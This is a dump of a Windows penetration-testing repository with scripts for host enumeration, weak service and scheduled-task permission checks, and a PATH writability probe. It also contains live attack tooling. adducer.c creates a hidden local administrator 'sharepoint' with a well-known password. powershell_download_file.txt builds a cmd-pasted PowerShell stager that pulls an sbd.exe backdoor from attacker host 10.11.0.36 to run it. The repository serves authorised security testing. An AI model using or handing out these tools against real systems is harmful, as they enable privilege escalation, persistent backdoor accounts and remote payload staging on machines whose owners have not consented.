Repository: ankh2054/windows-pentest
Branch: master
Commit: abc51e0b58de
Files: 7
Total size: 7.7 KB
Directory structure:
gitextract__chh5jcc/
├── Powershell/
│ ├── folderperms.ps1
│ └── powershell_download_file.txt
├── README.md
├── adducer.c
├── icacls.bat
├── schcheck.bat
└── wmic-info
================================================
FILE CONTENTS
================================================
================================================
FILE: Powershell/folderperms.ps1
================================================
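# Author : Parvez Anwar (@parvezghh)
# Date : 17/11/13
#
# Usage: powershell.exe -executionpolicy bypass -file folderperms.ps1
#
# Probes every directory on the current process's %PATH% by copying a
# throw-away file into it and deleting it again. A successful copy means the
# account running this script can write there. NOTE(review): that is the
# invoking user's access, not literally "Authenticated Users" as the README
# says -- the result depends on who runs the script.
#
# Operator caveats:
#  * Writing into a PATH directory is itself the planting vector; only run
#    this where you are authorised to modify the host, and expect the
#    transient file to appear in file-system auditing / EDR telemetry.
#  * The probe file name is randomised so an existing file with the same name
#    in a PATH directory is never overwritten and then deleted (the fixed
#    "testfile.txt" name used previously made that possible).
#  * Empty PATH entries (";;" or a trailing ";") are skipped up front because
#    Test-Path throws on an empty string.

$countcopies = 0
$filetocopy = "pathprobe-" + [System.IO.Path]::GetRandomFileName()

# Normalise the PATH list: trim whitespace, strip surrounding quotes some
# installers add, and drop empty entries.
$pathentries = @($env:PATH.Split(';') |
    ForEach-Object { $_.Trim().Trim('"') } |
    Where-Object { $_ -ne "" })

Write-Host ""
Write-Host "[i] Number of folder paths :" $pathentries.Count

New-Item $filetocopy -ItemType File | Out-Null
if (-not (Test-Path -LiteralPath $filetocopy))
{
    Write-Host "[i] Dummy test file used to test access was not outputted:" $filetocopy
    exit
}

Write-Host "[i] Copying and removing test file to path folders where access is granted"
foreach ($folder in $pathentries)
{
    # -LiteralPath: PATH entries may contain [ ] which would otherwise be
    # treated as wildcards.
    if (-not (Test-Path -LiteralPath $folder -PathType Container))
    {
        Write-Host -ForegroundColor Blue " Folder missing:" $folder
        continue
    }

    $target = Join-Path $folder $filetocopy
    Copy-Item -LiteralPath $filetocopy -Destination $target -ErrorAction SilentlyContinue -ErrorVariable errors
    if ($errors.Count -eq 0)
    {
        Write-Host -ForegroundColor Green " Access granted:" $folder
        $countcopies++
        # Clean up; report a failed delete rather than leave a silent artefact.
        Remove-Item -LiteralPath $target -ErrorAction SilentlyContinue -ErrorVariable rmerrors
        if ($rmerrors.Count -ne 0)
        {
            Write-Host -ForegroundColor Yellow " Could not remove probe file:" $target
        }
    }
    else
    {
        Write-Host -ForegroundColor Red " Access denied :" $folder
    }
}

Write-Host ""
Write-Host "[i] Writable PATH folders :" $countcopies
Remove-Item -LiteralPath $filetocopy -ErrorAction SilentlyContinue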
================================================
FILE: Powershell/powershell_download_file.txt
================================================
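REM Paste into a Windows cmd.exe prompt; each echo appends one line to wget.ps1.
REM cmd does not interpret $ or the quotes, so the PowerShell text lands literally.
REM NOTE(review): $storageDir was assigned but never used. WebClient.DownloadFile
REM resolves a bare relative filename against the .NET process working directory,
REM which is not necessarily PowerShell's $pwd, so the target is anchored to it.
REM The transfer is plain HTTP with no integrity check: point the URL at your own
REM staging host and verify the hash of what landed before executing it.
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.36/sbd.exe" >>wget.ps1
echo $file = Join-Path $storageDir "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1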
================================================
FILE: README.md
================================================
# windows-pentest
Windows Pentest Scripts and Tools.
#### wmic-info - Retrieve system info.
Uses WMIC to gather various important information about a Windows host and dumps it to HTML (out.html). The report contains account names, IP configuration and patch level, so treat it as sensitive and remove it from the host when done.
#### icacls.bat - Weak permissions on Services.
* Queries every installed service and reads its BINARY_PATH_NAME.
* Skips binaries under %SystemRoot%\System32 and %SystemRoot%\SysWOW64 (the stock Microsoft services).
* Runs icacls on the remaining executables to spot any where Everyone or the Users group has write (RW/modify) access — a replaceable service binary runs with the service's identity.
#### schcheck.bat - Weak permissions on scheduled task executables.
* Lists all scheduled tasks (`schtasks /query /v`) and records the command each one runs.
* At present it only collects those commands into results.txt; run the interesting ones through icacls to check whether Everyone or Users have write permissions on the executable.
#### adducer.c - Creates a user and adds it to the local Administrators group.
* Creates a user called sharepoint with password sharepoint and adds it to the local Administrators group. Must be run from an already-elevated context; the credential is well known, so remove the account once the engagement is over.
* To cross-compile on Kali: `i686-w64-mingw32-gcc -o useradd.exe adducer.c` (the source file in this repository is `adducer.c`).
#### Powershell/powershell_download_file.txt - Create wget powershell script to download external files.
* Copy file contents to clipboard using > `cat powershell_download_file.txt | xclip -selection clipboard`
* Paste into Windows command prompt which will create a **wget.ps1**
* `powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1`
#### Privilege/Accesschk-2003-xp.exe & accesschk-2008-vista.exe (Sysinternals AccessChk; the binaries are not included in this tree)
##### Identify the level of access a particular user or groups have to files, directories, Registry keys.
When any Sysinternals tool is run for the first time under an account it shows a GUI pop-up to accept the EULA.
That blocks non-interactive use (a reverse shell, a scheduled task, a remote session), so pass the extra
command-line flag below to accept the EULA automatically:
accesschk.exe /accepteula
The following command reports the access that the Power Users group has to files and directories in \Windows\System32:
accesschk "power users" c:\windows\system32
This command shows which Windows services members of the Users group have write access to:
accesschk users -cw *
Check what access authenticated users have to services.
accesschk.exe -uwcqv "Authenticated Users" *
Check which Windows services a user called adam.dale has write access to:
accesschk.exe -uwcqv adam.dale *
Check what access permissions are set on the service called NetLogon:
accesschk.exe -ucqv NetLogon
Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
To see which Registry keys under HKLM\Software a specific account has no access to:
accesschk -kns austin\mruss hklm\software
To see the security on the HKLM\Software key:
accesschk -k hklm\software
To see all files under \Users\Mark on Vista that have an explicit integrity level:
accesschk -e -s c:\users\mark
To see all global objects that Everyone can modify:
accesschk -wuo everyone \basednamedobjects
#### Powershell/folderperms.ps1
##### Checks which folders on the current PATH variable the account running the script can write to.
A folder created directly in the root of the system drive is writable by all authenticated users by default: it inherits the "NT AUTHORITY\Authenticated Users:(I)(M)" ACE, where M stands for modify access. So any application installed directly under the root (and placed on PATH) can be tampered with by a non-admin user.
The script copies a test file into each PATH directory and reports where the copy succeeds, i.e. where the account running it has write access (not strictly "Authenticated Users"). A writable PATH directory also allows planting a binary that will be picked up by anything resolved via PATH.
================================================
FILE: adducer.c
================================================
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
/* Creates a local user "sharepoint" with password "sharepoint" and adds it to the local Administrators group. Requires an elevated context; remove the account after use. */
/* To cross-compile on Kali: i686-w64-mingw32-gcc -o useradd.exe adducer.c */
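/*
 * Entry point: creates the local account "sharepoint" (password "sharepoint")
 * and adds it to the local Administrators group via net.exe.
 *
 * Both commands need an already-elevated context. "&" runs the second command
 * even if the first fails (e.g. the account already exists), which matches
 * the original behaviour. The result of system() was previously discarded,
 * so a failed command still exited 0 and looked like success; the exit
 * status of the command chain is now propagated as the process exit code.
 *
 * Operational note: this is deliberately noisy (well-known credential, local
 * admin membership, account-creation audit events). Remove the account when
 * the engagement is over.
 *
 * Returns EXIT_SUCCESS when the command chain exited 0, EXIT_FAILURE when it
 * exited non-zero or the command processor could not be started (-1).
 */
int main(void) {
    int rc = system("net user sharepoint sharepoint /add & net localgroup administrators sharepoint /add");
    if (rc == -1) {
        return EXIT_FAILURE;
    }
    return rc == 0 ? EXIT_SUCCESS : EXIT_FAILURE;
}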
================================================
FILE: icacls.bat
================================================
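@echo off
REM Description: Queries every installed service and, for each BINARY_PATH_NAME
REM outside %SystemRoot%\System32 and %SystemRoot%\SysWOW64, reports the
REM executables on which Everyone, BUILTIN\Users or Authenticated Users hold a
REM write-class ACE (F, M or W). Such a binary can be replaced by a low-privileged
REM user and will then run with the service's identity (often SYSTEM).
REM Type: Incorrect file permissions
REM Note: The ^ characters escape characters that would otherwise break the FOR loop.
REM Note: tokens=1* - The value at the first delimiter and everything after.
REM Limitation: a BINARY_PATH_NAME that carries arguments (e.g. "C:\app\svc.exe" -run)
REM is handed to icacls as one string and will not resolve; review those entries
REM by hand -- an unquoted path containing spaces is itself a finding.
for /f "tokens=1*" %%m in ('sc query state^= all ^| find "SERVICE_NAME"') do (
  for /f "tokens=1* delims=: " %%r in ('sc qc "%%~n" ^| find "BINARY_PATH_NAME"') do (
    for /f "delims=" %%x in ('echo(%%~s^| findstr /L /V /I /C:"%SystemRoot%\System32" /C:"%SystemRoot%\SysWOW64"') do (
      REM Print the path and its weak ACEs only when one is present; stderr is discarded to hide path-not-found noise.
      icacls "%%~x" 2>nul | findstr /L /I /C:"Everyone:" /C:"BUILTIN\Users:" /C:"Authenticated Users:" | findstr /L /C:"(F)" /C:"(M)" /C:"(W)" >nul && (
        echo(%%~x
        icacls "%%~x" 2>nul | findstr /L /I /C:"Everyone:" /C:"BUILTIN\Users:" /C:"Authenticated Users:"
      )
    )
  )
)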
================================================
FILE: schcheck.bat
================================================
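@echo off
REM - Lists all scheduled tasks and writes the command each one runs ("Task To Run")
REM   to results.txt, skipping COM-handler, multiple-action, %SystemRoot% and shutdown entries.
REM - Note: at present the script only collects the commands. Feed the ones of interest
REM   to icacls (see icacls.bat) to find executables Everyone or Users can modify; a task
REM   that runs as SYSTEM from a user-writable path is a privilege-escalation finding.
REM - Fix: the loop previously redirected with ">" so results.txt only ever held the
REM   last task, and a literal "REM" was echoed into the file as well.
if exist results.txt del results.txt
for /f "tokens=3* delims=: " %%m in ('schtasks /query /v /fo LIST ^| find "Task To Run:"') do (
  for /f "tokens=1* delims=?" %%x in ('echo(%%~n^| findstr /L /V /I /C:"COM handler" /C:"multiple" /C:"%SystemRoot%" /C:"shutdown"') do (
    >>results.txt echo(%%~x
  )
)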
================================================
FILE: wmic-info
================================================
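@echo off
REM Host inventory via WMIC: processes, services, local accounts and groups,
REM IP-enabled NICs, volumes, mapped network resources, hotfixes, autoruns,
REM installed products, OS details and timezone, rendered as HTML with the
REM htable.xsl stylesheet that ships with WMIC.
REM The report lists account names, addresses and patch level -- treat it as
REM sensitive engagement data and delete it from the host when finished.
REM NOTE(review): WMIC is deprecated on current Windows releases and the
REM stylesheet may be missing; the script now stops with a message instead of
REM running every query with an empty /format: argument.
set "var="
for /f "delims=" %%A in ('dir /s /b "%WINDIR%\system32\*htable.xsl" 2^>nul') do set "var=%%A"
if not defined var (
  echo [!] htable.xsl not found under %WINDIR%\system32 - cannot format WMIC output.
  exit /b 1
)
REM Start a fresh report rather than appending to one left by an earlier run.
if exist out.html del out.html
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html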